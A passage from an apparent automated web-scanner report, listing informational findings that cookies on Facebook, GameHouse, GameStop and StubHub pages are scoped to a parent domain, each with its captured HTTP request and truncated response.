Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...

13.130. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.42
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:40 GMT
Content-Length: 130477

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

13.131. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...

13.132. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

13.133. http://www.facebook.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.40
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:25 GMT
Content-Length: 0


13.134. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...

13.135. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...

13.136. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

13.137. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...

13.138. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...

13.139. http://www.gamehouse.com/images/subsidiary.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamehouse.com
Path:   /images/subsidiary.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/subsidiary.png HTTP/1.1
Host: www.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Set-Cookie: referrer=aHR0cDovL3N1cHBvcnQuZ2FtZWhvdXNlLmNvbS8=
Set-Cookie: JSESSIONID=A68BAE3959CA123F9A7FB421FB8A1170.gh-storefront-app03; Path=/
ETag: W/"2557-1310759798000"
Last-Modified: Fri, 15 Jul 2011 19:56:38 GMT
Content-Type: image/png;charset=UTF-8
Content-Length: 2557
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Wed, 20-Jul-2011 20:24:53 GMT;path=/;domain=gamehouse.com;httponly

.PNG
.
...IHDR...\...".......N.....tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......=R............LLL.i.... jjj.......]..t.eee...QQQ+Sk+7?")-.8H.V|@T_.a.rrrJJJ...*ET...vvv....|.+Nc^^^
g.lll....a.~~
...[SNIP]...

13.140. http://www.gamestop.com/Recommendations.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /Recommendations.axd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Recommendations.axd HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/json; charset=utf-8
Content-Length: 10
Date: Tue, 19 Jul 2011 16:04:47 GMT
Connection: close
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/
Set-Cookie: CactusState=V=1&31=False; path=/
Set-Cookie: RES_TRACKINGID=783322707284241; domain=gamestop.com; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/

{"d":null}

13.141. http://www.stubhub.com/TeaLeafTarget.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /TeaLeafTarget.html HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 973
Origin: http://www.stubhub.com
X-TeaLeaf-Page-Img-Fail: 2
X-TeaLeaf-Page-Render: 6032
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.03.15.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 2
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
